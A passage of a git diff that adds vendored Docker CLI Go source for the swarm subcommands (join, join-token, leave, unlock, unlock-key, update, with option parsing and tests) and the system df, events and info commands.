+	"golang.org/x/net/context"
+)
+
+type joinOptions struct {
+	remote     string
+	listenAddr NodeAddrOption
+	// Not a NodeAddrOption because it has no default port.
+	advertiseAddr string
+	token         string
+}
+
+func newJoinCommand(dockerCli *command.DockerCli) *cobra.Command {
+	opts := joinOptions{
+		listenAddr: NewListenAddrOption(),
+	}
+
+	cmd := &cobra.Command{
+		Use:   "join [OPTIONS] HOST:PORT",
+		Short: "Join a swarm as a node and/or manager",
+		Args:  cli.ExactArgs(1),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			opts.remote = args[0]
+			return runJoin(dockerCli, opts)
+		},
+	}
+
+	flags := cmd.Flags()
+	flags.Var(&opts.listenAddr, flagListenAddr, "Listen address (format: <ip|interface>[:port])")
+	flags.StringVar(&opts.advertiseAddr, flagAdvertiseAddr, "", "Advertised address (format: <ip|interface>[:port])")
+	flags.StringVar(&opts.token, flagToken, "", "Token for entry into the swarm")
+	return cmd
+}
+
+func runJoin(dockerCli *command.DockerCli, opts joinOptions) error {
+	client := dockerCli.Client()
+	ctx := context.Background()
+
+	req := swarm.JoinRequest{
+		JoinToken:     opts.token,
+		ListenAddr:    opts.listenAddr.String(),
+		AdvertiseAddr: opts.advertiseAddr,
+		RemoteAddrs:   []string{opts.remote},
+	}
+	err := client.SwarmJoin(ctx, req)
+	if err != nil {
+		return err
+	}
+
+	info, err := client.Info(ctx)
+	if err != nil {
+		return err
+	}
+
+	if info.Swarm.ControlAvailable {
+		fmt.Fprintln(dockerCli.Out(), "This node joined a swarm as a manager.")
+	} else {
+		fmt.Fprintln(dockerCli.Out(), "This node joined a swarm as a worker.")
+	}
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/cli/command/swarm/join_token.go b/vendor/github.com/docker/docker/cli/command/swarm/join_token.go
new file mode 100644
index 0000000000..3a17a8020f
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/swarm/join_token.go
@@ -0,0 +1,105 @@
+package swarm
+
+import (
+	"errors"
+	"fmt"
+
+	"github.com/spf13/cobra"
+
+	"github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"golang.org/x/net/context"
+)
+
+func newJoinTokenCommand(dockerCli *command.DockerCli) *cobra.Command {
+	var rotate, quiet bool
+
+	cmd := &cobra.Command{
+		Use:   "join-token [OPTIONS] (worker|manager)",
+		Short: "Manage join tokens",
+		Args:  cli.ExactArgs(1),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			worker := args[0] == "worker"
+			manager := args[0] == "manager"
+
+			if !worker && !manager {
+				return errors.New("unknown role " + args[0])
+			}
+
+			client := dockerCli.Client()
+			ctx := context.Background()
+
+			if rotate {
+				var flags swarm.UpdateFlags
+
+				swarm, err := client.SwarmInspect(ctx)
+				if err != nil {
+					return err
+				}
+
+				flags.RotateWorkerToken = worker
+				flags.RotateManagerToken = manager
+
+				err = client.SwarmUpdate(ctx, swarm.Version, swarm.Spec, flags)
+				if err != nil {
+					return err
+				}
+				if !quiet {
+					fmt.Fprintf(dockerCli.Out(), "Successfully rotated %s join token.\n\n", args[0])
+				}
+			}
+
+			swarm, err := client.SwarmInspect(ctx)
+			if err != nil {
+				return err
+			}
+
+			if quiet {
+				if worker {
+					fmt.Fprintln(dockerCli.Out(), swarm.JoinTokens.Worker)
+				} else {
+					fmt.Fprintln(dockerCli.Out(), swarm.JoinTokens.Manager)
+				}
+			} else {
+				info, err := client.Info(ctx)
+				if err != nil {
+					return err
+				}
+				return printJoinCommand(ctx, dockerCli, info.Swarm.NodeID, worker, manager)
+			}
+			return nil
+		},
+	}
+
+	flags := cmd.Flags()
+	flags.BoolVar(&rotate, flagRotate, false, "Rotate join token")
+	flags.BoolVarP(&quiet, flagQuiet, "q", false, "Only display token")
+
+	return cmd
+}
+
+func printJoinCommand(ctx context.Context, dockerCli *command.DockerCli, nodeID string, worker bool, manager bool) error {
+	client := dockerCli.Client()
+
+	swarm, err := client.SwarmInspect(ctx)
+	if err != nil {
+		return err
+	}
+
+	node, _, err := client.NodeInspectWithRaw(ctx, nodeID)
+	if err != nil {
+		return err
+	}
+
+	if node.ManagerStatus != nil {
+		if worker {
+			fmt.Fprintf(dockerCli.Out(), "To add a worker to this swarm, run the following command:\n\n    docker swarm join \\\n    --token %s \\\n    %s\n\n", swarm.JoinTokens.Worker, node.ManagerStatus.Addr)
+		}
+		if manager {
+			fmt.Fprintf(dockerCli.Out(), "To add a manager to this swarm, run the following command:\n\n    docker swarm join \\\n    --token %s \\\n    %s\n\n", swarm.JoinTokens.Manager, node.ManagerStatus.Addr)
+		}
+	}
+
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/cli/command/swarm/leave.go b/vendor/github.com/docker/docker/cli/command/swarm/leave.go
new file mode 100644
index 0000000000..e2cfa0a045
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/swarm/leave.go
@@ -0,0 +1,44 @@
+package swarm
+
+import (
+	"fmt"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/spf13/cobra"
+)
+
+type leaveOptions struct {
+	force bool
+}
+
+func newLeaveCommand(dockerCli *command.DockerCli) *cobra.Command {
+	opts := leaveOptions{}
+
+	cmd := &cobra.Command{
+		Use:   "leave [OPTIONS]",
+		Short: "Leave the swarm",
+		Args:  cli.NoArgs,
+		RunE: func(cmd *cobra.Command, args []string) error {
+			return runLeave(dockerCli, opts)
+		},
+	}
+
+	flags := cmd.Flags()
+	flags.BoolVarP(&opts.force, "force", "f", false, "Force this node to leave the swarm, ignoring warnings")
+	return cmd
+}
+
+func runLeave(dockerCli *command.DockerCli, opts leaveOptions) error {
+	client := dockerCli.Client()
+	ctx := context.Background()
+
+	if err := client.SwarmLeave(ctx, opts.force); err != nil {
+		return err
+	}
+
+	fmt.Fprintln(dockerCli.Out(), "Node left the swarm.")
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/cli/command/swarm/opts.go b/vendor/github.com/docker/docker/cli/command/swarm/opts.go
new file mode 100644
index 0000000000..9db46dcf55
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/swarm/opts.go
@@ -0,0 +1,209 @@
+package swarm
+
+import (
+	"encoding/csv"
+	"errors"
+	"fmt"
+	"strings"
+	"time"
+
+	"github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/opts"
+	"github.com/spf13/pflag"
+)
+
+const (
+	defaultListenAddr = "0.0.0.0:2377"
+
+	flagCertExpiry          = "cert-expiry"
+	flagDispatcherHeartbeat = "dispatcher-heartbeat"
+	flagListenAddr          = "listen-addr"
+	flagAdvertiseAddr       = "advertise-addr"
+	flagQuiet               = "quiet"
+	flagRotate              = "rotate"
+	flagToken               = "token"
+	flagTaskHistoryLimit    = "task-history-limit"
+	flagExternalCA          = "external-ca"
+	flagMaxSnapshots        = "max-snapshots"
+	flagSnapshotInterval    = "snapshot-interval"
+	flagLockKey             = "lock-key"
+	flagAutolock            = "autolock"
+)
+
+type swarmOptions struct {
+	taskHistoryLimit    int64
+	dispatcherHeartbeat time.Duration
+	nodeCertExpiry      time.Duration
+	externalCA          ExternalCAOption
+	maxSnapshots        uint64
+	snapshotInterval    uint64
+	autolock            bool
+}
+
+// NodeAddrOption is a pflag.Value for listening addresses
+type NodeAddrOption struct {
+	addr string
+}
+
+// String prints the representation of this flag
+func (a *NodeAddrOption) String() string {
+	return a.Value()
+}
+
+// Set the value for this flag
+func (a *NodeAddrOption) Set(value string) error {
+	addr, err := opts.ParseTCPAddr(value, a.addr)
+	if err != nil {
+		return err
+	}
+	a.addr = addr
+	return nil
+}
+
+// Type returns the type of this flag
+func (a *NodeAddrOption) Type() string {
+	return "node-addr"
+}
+
+// Value returns the value of this option as addr:port
+func (a *NodeAddrOption) Value() string {
+	return strings.TrimPrefix(a.addr, "tcp://")
+}
+
+// NewNodeAddrOption returns a new node address option
+func NewNodeAddrOption(addr string) NodeAddrOption {
+	return NodeAddrOption{addr}
+}
+
+// NewListenAddrOption returns a NodeAddrOption with default values
+func NewListenAddrOption() NodeAddrOption {
+	return NewNodeAddrOption(defaultListenAddr)
+}
+
+// ExternalCAOption is a Value type for parsing external CA specifications.
+type ExternalCAOption struct {
+	values []*swarm.ExternalCA
+}
+
+// Set parses an external CA option.
+func (m *ExternalCAOption) Set(value string) error {
+	parsed, err := parseExternalCA(value)
+	if err != nil {
+		return err
+	}
+
+	m.values = append(m.values, parsed)
+	return nil
+}
+
+// Type returns the type of this option.
+func (m *ExternalCAOption) Type() string {
+	return "external-ca"
+}
+
+// String returns a string repr of this option.
+func (m *ExternalCAOption) String() string {
+	externalCAs := []string{}
+	for _, externalCA := range m.values {
+		repr := fmt.Sprintf("%s: %s", externalCA.Protocol, externalCA.URL)
+		externalCAs = append(externalCAs, repr)
+	}
+	return strings.Join(externalCAs, ", ")
+}
+
+// Value returns the external CAs
+func (m *ExternalCAOption) Value() []*swarm.ExternalCA {
+	return m.values
+}
+
+// parseExternalCA parses an external CA specification from the command line,
+// such as protocol=cfssl,url=https://example.com.
+func parseExternalCA(caSpec string) (*swarm.ExternalCA, error) {
+	csvReader := csv.NewReader(strings.NewReader(caSpec))
+	fields, err := csvReader.Read()
+	if err != nil {
+		return nil, err
+	}
+
+	externalCA := swarm.ExternalCA{
+		Options: make(map[string]string),
+	}
+
+	var (
+		hasProtocol bool
+		hasURL      bool
+	)
+
+	for _, field := range fields {
+		parts := strings.SplitN(field, "=", 2)
+
+		if len(parts) != 2 {
+			return nil, fmt.Errorf("invalid field '%s' must be a key=value pair", field)
+		}
+
+		key, value := parts[0], parts[1]
+
+		switch strings.ToLower(key) {
+		case "protocol":
+			hasProtocol = true
+			if strings.ToLower(value) == string(swarm.ExternalCAProtocolCFSSL) {
+				externalCA.Protocol = swarm.ExternalCAProtocolCFSSL
+			} else {
+				return nil, fmt.Errorf("unrecognized external CA protocol %s", value)
+			}
+		case "url":
+			hasURL = true
+			externalCA.URL = value
+		default:
+			externalCA.Options[key] = value
+		}
+	}
+
+	if !hasProtocol {
+		return nil, errors.New("the external-ca option needs a protocol= parameter")
+	}
+	if !hasURL {
+		return nil, errors.New("the external-ca option needs a url= parameter")
+	}
+
+	return &externalCA, nil
+}
+
+func addSwarmFlags(flags *pflag.FlagSet, opts *swarmOptions) {
+	flags.Int64Var(&opts.taskHistoryLimit, flagTaskHistoryLimit, 5, "Task history retention limit")
+	flags.DurationVar(&opts.dispatcherHeartbeat, flagDispatcherHeartbeat, time.Duration(5*time.Second), "Dispatcher heartbeat period (ns|us|ms|s|m|h)")
+	flags.DurationVar(&opts.nodeCertExpiry, flagCertExpiry, time.Duration(90*24*time.Hour), "Validity period for node certificates (ns|us|ms|s|m|h)")
+	flags.Var(&opts.externalCA, flagExternalCA, "Specifications of one or more certificate signing endpoints")
+	flags.Uint64Var(&opts.maxSnapshots, flagMaxSnapshots, 0, "Number of additional Raft snapshots to retain")
+	flags.Uint64Var(&opts.snapshotInterval, flagSnapshotInterval, 10000, "Number of log entries between Raft snapshots")
+}
+
+func (opts *swarmOptions) mergeSwarmSpec(spec *swarm.Spec, flags *pflag.FlagSet) {
+	if flags.Changed(flagTaskHistoryLimit) {
+		spec.Orchestration.TaskHistoryRetentionLimit = &opts.taskHistoryLimit
+	}
+	if flags.Changed(flagDispatcherHeartbeat) {
+		spec.Dispatcher.HeartbeatPeriod = opts.dispatcherHeartbeat
+	}
+	if flags.Changed(flagCertExpiry) {
+		spec.CAConfig.NodeCertExpiry = opts.nodeCertExpiry
+	}
+	if flags.Changed(flagExternalCA) {
+		spec.CAConfig.ExternalCAs = opts.externalCA.Value()
+	}
+	if flags.Changed(flagMaxSnapshots) {
+		spec.Raft.KeepOldSnapshots = &opts.maxSnapshots
+	}
+	if flags.Changed(flagSnapshotInterval) {
+		spec.Raft.SnapshotInterval = opts.snapshotInterval
+	}
+	if flags.Changed(flagAutolock) {
+		spec.EncryptionConfig.AutoLockManagers = opts.autolock
+	}
+}
+
+func (opts *swarmOptions) ToSpec(flags *pflag.FlagSet) swarm.Spec {
+	var spec swarm.Spec
+	opts.mergeSwarmSpec(&spec, flags)
+	return spec
+}
diff --git a/vendor/github.com/docker/docker/cli/command/swarm/opts_test.go b/vendor/github.com/docker/docker/cli/command/swarm/opts_test.go
new file mode 100644
index 0000000000..568dc87302
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/swarm/opts_test.go
@@ -0,0 +1,37 @@
+package swarm
+
+import (
+	"testing"
+
+	"github.com/docker/docker/pkg/testutil/assert"
+)
+
+func TestNodeAddrOptionSetHostAndPort(t *testing.T) {
+	opt := NewNodeAddrOption("old:123")
+	addr := "newhost:5555"
+	assert.NilError(t, opt.Set(addr))
+	assert.Equal(t, opt.Value(), addr)
+}
+
+func TestNodeAddrOptionSetHostOnly(t *testing.T) {
+	opt := NewListenAddrOption()
+	assert.NilError(t, opt.Set("newhost"))
+	assert.Equal(t, opt.Value(), "newhost:2377")
+}
+
+func TestNodeAddrOptionSetHostOnlyIPv6(t *testing.T) {
+	opt := NewListenAddrOption()
+	assert.NilError(t, opt.Set("::1"))
+	assert.Equal(t, opt.Value(), "[::1]:2377")
+}
+
+func TestNodeAddrOptionSetPortOnly(t *testing.T) {
+	opt := NewListenAddrOption()
+	assert.NilError(t, opt.Set(":4545"))
+	assert.Equal(t, opt.Value(), "0.0.0.0:4545")
+}
+
+func TestNodeAddrOptionSetInvalidFormat(t *testing.T) {
+	opt := NewListenAddrOption()
+	assert.Error(t, opt.Set("http://localhost:4545"), "Invalid")
+}
diff --git a/vendor/github.com/docker/docker/cli/command/swarm/unlock.go b/vendor/github.com/docker/docker/cli/command/swarm/unlock.go
new file mode 100644
index 0000000000..048fb56e3d
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/swarm/unlock.go
@@ -0,0 +1,54 @@
+package swarm
+
+import (
+	"bufio"
+	"fmt"
+	"io"
+	"strings"
+
+	"github.com/spf13/cobra"
+	"golang.org/x/crypto/ssh/terminal"
+
+	"github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"golang.org/x/net/context"
+)
+
+func newUnlockCommand(dockerCli *command.DockerCli) *cobra.Command {
+	cmd := &cobra.Command{
+		Use:   "unlock",
+		Short: "Unlock swarm",
+		Args:  cli.ExactArgs(0),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			client := dockerCli.Client()
+			ctx := context.Background()
+
+			key, err := readKey(dockerCli.In(), "Please enter unlock key: ")
+			if err != nil {
+				return err
+			}
+			req := swarm.UnlockRequest{
+				UnlockKey: key,
+			}
+
+			return client.SwarmUnlock(ctx, req)
+		},
+	}
+
+	return cmd
+}
+
+func readKey(in *command.InStream, prompt string) (string, error) {
+	if in.IsTerminal() {
+		fmt.Print(prompt)
+		dt, err := terminal.ReadPassword(int(in.FD()))
+		fmt.Println()
+		return string(dt), err
+	}
+	key, err := bufio.NewReader(in).ReadString('\n')
+	if err == io.EOF {
+		err = nil
+	}
+	return strings.TrimSpace(key), err
+}
diff --git a/vendor/github.com/docker/docker/cli/command/swarm/unlock_key.go b/vendor/github.com/docker/docker/cli/command/swarm/unlock_key.go
new file mode 100644
index 0000000000..96450f55b8
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/swarm/unlock_key.go
@@ -0,0 +1,79 @@
+package swarm
+
+import (
+	"fmt"
+
+	"github.com/spf13/cobra"
+
+	"github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/pkg/errors"
+	"golang.org/x/net/context"
+)
+
+func newUnlockKeyCommand(dockerCli *command.DockerCli) *cobra.Command {
+	var rotate, quiet bool
+
+	cmd := &cobra.Command{
+		Use:   "unlock-key [OPTIONS]",
+		Short: "Manage the unlock key",
+		Args:  cli.NoArgs,
+		RunE: func(cmd *cobra.Command, args []string) error {
+			client := dockerCli.Client()
+			ctx := context.Background()
+
+			if rotate {
+				flags := swarm.UpdateFlags{RotateManagerUnlockKey: true}
+
+				swarm, err := client.SwarmInspect(ctx)
+				if err != nil {
+					return err
+				}
+
+				if !swarm.Spec.EncryptionConfig.AutoLockManagers {
+					return errors.New("cannot rotate because autolock is not turned on")
+				}
+
+				err = client.SwarmUpdate(ctx, swarm.Version, swarm.Spec, flags)
+				if err != nil {
+					return err
+				}
+				if !quiet {
+					fmt.Fprintf(dockerCli.Out(), "Successfully rotated manager unlock key.\n\n")
+				}
+			}
+
+			unlockKeyResp, err := client.SwarmGetUnlockKey(ctx)
+			if err != nil {
+				return errors.Wrap(err, "could not fetch unlock key")
+			}
+
+			if unlockKeyResp.UnlockKey == "" {
+				return errors.New("no unlock key is set")
+			}
+
+			if quiet {
+				fmt.Fprintln(dockerCli.Out(), unlockKeyResp.UnlockKey)
+			} else {
+				printUnlockCommand(ctx, dockerCli, unlockKeyResp.UnlockKey)
+			}
+			return nil
+		},
+	}
+
+	flags := cmd.Flags()
+	flags.BoolVar(&rotate, flagRotate, false, "Rotate unlock key")
+	flags.BoolVarP(&quiet, flagQuiet, "q", false, "Only display token")
+
+	return cmd
+}
+
+func printUnlockCommand(ctx context.Context, dockerCli *command.DockerCli, unlockKey string) {
+	if len(unlockKey) == 0 {
+		return
+	}
+
+	fmt.Fprintf(dockerCli.Out(), "To unlock a swarm manager after it restarts, run the `docker swarm unlock`\ncommand and provide the following key:\n\n    %s\n\nPlease remember to store this key in a password manager, since without it you\nwill not be able to restart the manager.\n", unlockKey)
+	return
+}
diff --git a/vendor/github.com/docker/docker/cli/command/swarm/update.go b/vendor/github.com/docker/docker/cli/command/swarm/update.go
new file mode 100644
index 0000000000..dbbd268725
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/swarm/update.go
@@ -0,0 +1,72 @@
+package swarm
+
+import (
+	"fmt"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/pkg/errors"
+	"github.com/spf13/cobra"
+	"github.com/spf13/pflag"
+)
+
+func newUpdateCommand(dockerCli *command.DockerCli) *cobra.Command {
+	opts := swarmOptions{}
+
+	cmd := &cobra.Command{
+		Use:   "update [OPTIONS]",
+		Short: "Update the swarm",
+		Args:  cli.NoArgs,
+		RunE: func(cmd *cobra.Command, args []string) error {
+			return runUpdate(dockerCli, cmd.Flags(), opts)
+		},
+		PreRunE: func(cmd *cobra.Command, args []string) error {
+			if cmd.Flags().NFlag() == 0 {
+				return pflag.ErrHelp
+			}
+			return nil
+		},
+	}
+
+	cmd.Flags().BoolVar(&opts.autolock, flagAutolock, false, "Change manager autolocking setting (true|false)")
+	addSwarmFlags(cmd.Flags(), &opts)
+	return cmd
+}
+
+func runUpdate(dockerCli *command.DockerCli, flags *pflag.FlagSet, opts swarmOptions) error {
+	client := dockerCli.Client()
+	ctx := context.Background()
+
+	var updateFlags swarm.UpdateFlags
+
+	swarm, err := client.SwarmInspect(ctx)
+	if err != nil {
+		return err
+	}
+
+	prevAutoLock := swarm.Spec.EncryptionConfig.AutoLockManagers
+
+	opts.mergeSwarmSpec(&swarm.Spec, flags)
+
+	curAutoLock := swarm.Spec.EncryptionConfig.AutoLockManagers
+
+	err = client.SwarmUpdate(ctx, swarm.Version, swarm.Spec, updateFlags)
+	if err != nil {
+		return err
+	}
+
+	fmt.Fprintln(dockerCli.Out(), "Swarm updated.")
+
+	if curAutoLock && !prevAutoLock {
+		unlockKeyResp, err := client.SwarmGetUnlockKey(ctx)
+		if err != nil {
+			return errors.Wrap(err, "could not fetch unlock key")
+		}
+		printUnlockCommand(ctx, dockerCli, unlockKeyResp.UnlockKey)
+	}
+
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/cli/command/system/cmd.go b/vendor/github.com/docker/docker/cli/command/system/cmd.go
new file mode 100644
index 0000000000..ab3beb895a
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/system/cmd.go
@@ -0,0 +1,26 @@
+package system
+
+import (
+	"github.com/spf13/cobra"
+
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+)
+
+// NewSystemCommand returns a cobra command for `system` subcommands
+func NewSystemCommand(dockerCli *command.DockerCli) *cobra.Command {
+	cmd := &cobra.Command{
+		Use:   "system",
+		Short: "Manage Docker",
+		Args:  cli.NoArgs,
+		RunE:  dockerCli.ShowHelp,
+	}
+	cmd.AddCommand(
+		NewEventsCommand(dockerCli),
+		NewInfoCommand(dockerCli),
+		NewDiskUsageCommand(dockerCli),
+		NewPruneCommand(dockerCli),
+	)
+
+	return cmd
+}
diff --git a/vendor/github.com/docker/docker/cli/command/system/df.go b/vendor/github.com/docker/docker/cli/command/system/df.go
new file mode 100644
index 0000000000..9f712484aa
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/system/df.go
@@ -0,0 +1,56 @@
+package system
+
+import (
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/docker/docker/cli/command/formatter"
+	"github.com/spf13/cobra"
+	"golang.org/x/net/context"
+)
+
+type diskUsageOptions struct {
+	verbose bool
+}
+
+// NewDiskUsageCommand creates a new cobra.Command for `docker df`
+func NewDiskUsageCommand(dockerCli *command.DockerCli) *cobra.Command {
+	var opts diskUsageOptions
+
+	cmd := &cobra.Command{
+		Use:   "df [OPTIONS]",
+		Short: "Show docker disk usage",
+		Args:  cli.NoArgs,
+		RunE: func(cmd *cobra.Command, args []string) error {
+			return runDiskUsage(dockerCli, opts)
+		},
+		Tags: map[string]string{"version": "1.25"},
+	}
+
+	flags := cmd.Flags()
+
+	flags.BoolVarP(&opts.verbose, "verbose", "v", false, "Show detailed information on space usage")
+
+	return cmd
+}
+
+func runDiskUsage(dockerCli *command.DockerCli, opts diskUsageOptions) error {
+	du, err := dockerCli.Client().DiskUsage(context.Background())
+	if err != nil {
+		return err
+	}
+
+	duCtx := formatter.DiskUsageContext{
+		Context: formatter.Context{
+			Output: dockerCli.Out(),
+		},
+		LayersSize: du.LayersSize,
+		Images:     du.Images,
+		Containers: du.Containers,
+		Volumes:    du.Volumes,
+		Verbose:    opts.verbose,
+	}
+
+	duCtx.Write()
+
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/cli/command/system/events.go b/vendor/github.com/docker/docker/cli/command/system/events.go
new file mode 100644
index 0000000000..087523051a
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/system/events.go
@@ -0,0 +1,140 @@
+package system
+
+import (
+	"fmt"
+	"io"
+	"io/ioutil"
+	"sort"
+	"strings"
+	"text/template"
+	"time"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/api/types"
+	eventtypes "github.com/docker/docker/api/types/events"
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/docker/docker/opts"
+	"github.com/docker/docker/pkg/jsonlog"
+	"github.com/docker/docker/utils/templates"
+	"github.com/spf13/cobra"
+)
+
+type eventsOptions struct {
+	since  string
+	until  string
+	filter opts.FilterOpt
+	format string
+}
+
+// NewEventsCommand creates a new cobra.Command for `docker events`
+func NewEventsCommand(dockerCli *command.DockerCli) *cobra.Command {
+	opts := eventsOptions{filter: opts.NewFilterOpt()}
+
+	cmd := &cobra.Command{
+		Use:   "events [OPTIONS]",
+		Short: "Get real time events from the server",
+		Args:  cli.NoArgs,
+		RunE: func(cmd *cobra.Command, args []string) error {
+			return runEvents(dockerCli, &opts)
+		},
+	}
+
+	flags := cmd.Flags()
+	flags.StringVar(&opts.since, "since", "", "Show all events created since timestamp")
+	flags.StringVar(&opts.until, "until", "", "Stream events until this timestamp")
+	flags.VarP(&opts.filter, "filter", "f", "Filter output based on conditions provided")
+	flags.StringVar(&opts.format, "format", "", "Format the output using the given Go template")
+
+	return cmd
+}
+
+func runEvents(dockerCli *command.DockerCli, opts *eventsOptions) error {
+	tmpl, err := makeTemplate(opts.format)
+	if err != nil {
+		return cli.StatusError{
+			StatusCode: 64,
+			Status:     "Error parsing format: " + err.Error()}
+	}
+	options := types.EventsOptions{
+		Since:   opts.since,
+		Until:   opts.until,
+		Filters: opts.filter.Value(),
+	}
+
+	ctx, cancel := context.WithCancel(context.Background())
+	events, errs := dockerCli.Client().Events(ctx, options)
+	defer cancel()
+
+	out := dockerCli.Out()
+
+	for {
+		select {
+		case event := <-events:
+			if err := handleEvent(out, event, tmpl); err != nil {
+				return err
+			}
+		case err := <-errs:
+			if err == io.EOF {
+				return nil
+			}
+			return err
+		}
+	}
+}
+
+func handleEvent(out io.Writer, event eventtypes.Message, tmpl *template.Template) error {
+	if tmpl == nil {
+		return prettyPrintEvent(out, event)
+	}
+
+	return formatEvent(out, event, tmpl)
+}
+
+func makeTemplate(format string) (*template.Template, error) {
+	if format == "" {
+		return nil, nil
+	}
+	tmpl, err := templates.Parse(format)
+	if err != nil {
+		return tmpl, err
+	}
+	// we execute the template for an empty message, so as to validate
+	// a bad template like "{{.badFieldString}}"
+	return tmpl, tmpl.Execute(ioutil.Discard, &eventtypes.Message{})
+}
+
+// prettyPrintEvent prints all types of event information.
+// Each output includes the event type, actor id, name and action.
+// Actor attributes are printed at the end if the actor has any.
+func prettyPrintEvent(out io.Writer, event eventtypes.Message) error {
+	if event.TimeNano != 0 {
+		fmt.Fprintf(out, "%s ", time.Unix(0, event.TimeNano).Format(jsonlog.RFC3339NanoFixed))
+	} else if event.Time != 0 {
+		fmt.Fprintf(out, "%s ", time.Unix(event.Time, 0).Format(jsonlog.RFC3339NanoFixed))
+	}
+
+	fmt.Fprintf(out, "%s %s %s", event.Type, event.Action, event.Actor.ID)
+
+	if len(event.Actor.Attributes) > 0 {
+		var attrs []string
+		var keys []string
+		for k := range event.Actor.Attributes {
+			keys = append(keys, k)
+		}
+		sort.Strings(keys)
+		for _, k := range keys {
+			v := event.Actor.Attributes[k]
+			attrs = append(attrs, fmt.Sprintf("%s=%s", k, v))
+		}
+		fmt.Fprintf(out, " (%s)", strings.Join(attrs, ", "))
+	}
+	fmt.Fprint(out, "\n")
+	return nil
+}
+
+func formatEvent(out io.Writer, event eventtypes.Message, tmpl *template.Template) error {
+	defer out.Write([]byte{'\n'})
+	return tmpl.Execute(out, event)
+}
diff --git a/vendor/github.com/docker/docker/cli/command/system/info.go b/vendor/github.com/docker/docker/cli/command/system/info.go
new file mode 100644
index 0000000000..e0b8767377
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/system/info.go
@@ -0,0 +1,334 @@
+package system
+
+import (
+	"fmt"
+	"sort"
+	"strings"
+	"time"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/docker/docker/pkg/ioutils"
+	"github.com/docker/docker/utils"
+	"github.com/docker/docker/utils/templates"
+	"github.com/docker/go-units"
+	"github.com/spf13/cobra"
+)
+
+type infoOptions struct {
+	format string
+}
+
+// NewInfoCommand creates a new cobra.Command for `docker info`
+func NewInfoCommand(dockerCli *command.DockerCli) *cobra.Command {
+	var opts infoOptions
+
+	cmd := &cobra.Command{
+		Use:   "info [OPTIONS]",
+		Short: "Display system-wide information",
+		Args:  cli.NoArgs,
+		RunE: func(cmd *cobra.Command, args []string) error {
+			return runInfo(dockerCli, &opts)
+		},
+	}
+
+	flags := cmd.Flags()
+
+	flags.StringVarP(&opts.format, "format", "f", "", "Format the output using the given Go template")
+
+	return cmd
+}
+
+func runInfo(dockerCli *command.DockerCli, opts *infoOptions) error {
+	ctx := context.Background()
+	info, err := dockerCli.Client().Info(ctx)
+	if err != nil {
+		return err
+	}
+	if opts.format == "" {
+		return prettyPrintInfo(dockerCli, info)
+	}
+	return formatInfo(dockerCli, info, opts.format)
+}
+
+func prettyPrintInfo(dockerCli *command.DockerCli, info types.Info) error {
+	fmt.Fprintf(dockerCli.Out(), "Containers: %d\n", info.Containers)
+	fmt.Fprintf(dockerCli.Out(), " Running: %d\n", info.ContainersRunning)
+	fmt.Fprintf(dockerCli.Out(), " Paused: %d\n", info.ContainersPaused)
+	fmt.Fprintf(dockerCli.Out(), " Stopped: %d\n", info.ContainersStopped)
+	fmt.Fprintf(dockerCli.Out(), "Images: %d\n", info.Images)
+	ioutils.FprintfIfNotEmpty(dockerCli.Out(), "Server Version: %s\n", info.ServerVersion)
+	ioutils.FprintfIfNotEmpty(dockerCli.Out(), "Storage Driver: %s\n", info.Driver)
+	if info.DriverStatus != nil {
+		for _, pair := range info.DriverStatus {
+			fmt.Fprintf(dockerCli.Out(), " %s: %s\n", pair[0], pair[1])
+
+			// print a warning if devicemapper is using a loopback file
+			if pair[0] == "Data loop file" {
+				fmt.Fprintln(dockerCli.Err(), " WARNING: Usage of loopback devices is strongly discouraged for production use. Use `--storage-opt dm.thinpooldev` to specify a custom block storage device.")
+			}
+		}
+
+	}
+	if info.SystemStatus != nil {
+		for _, pair := range info.SystemStatus {
+			fmt.Fprintf(dockerCli.Out(), "%s: %s\n", pair[0], pair[1])
+		}
+	}
+	ioutils.FprintfIfNotEmpty(dockerCli.Out(), "Logging Driver: %s\n", info.LoggingDriver)
+	ioutils.FprintfIfNotEmpty(dockerCli.Out(), "Cgroup Driver: %s\n", info.CgroupDriver)
+
+	fmt.Fprintf(dockerCli.Out(), "Plugins: \n")
+	fmt.Fprintf(dockerCli.Out(), " Volume:")
+	fmt.Fprintf(dockerCli.Out(), " %s", strings.Join(info.Plugins.Volume, " "))
+	fmt.Fprintf(dockerCli.Out(), "\n")
+	fmt.Fprintf(dockerCli.Out(), " Network:")
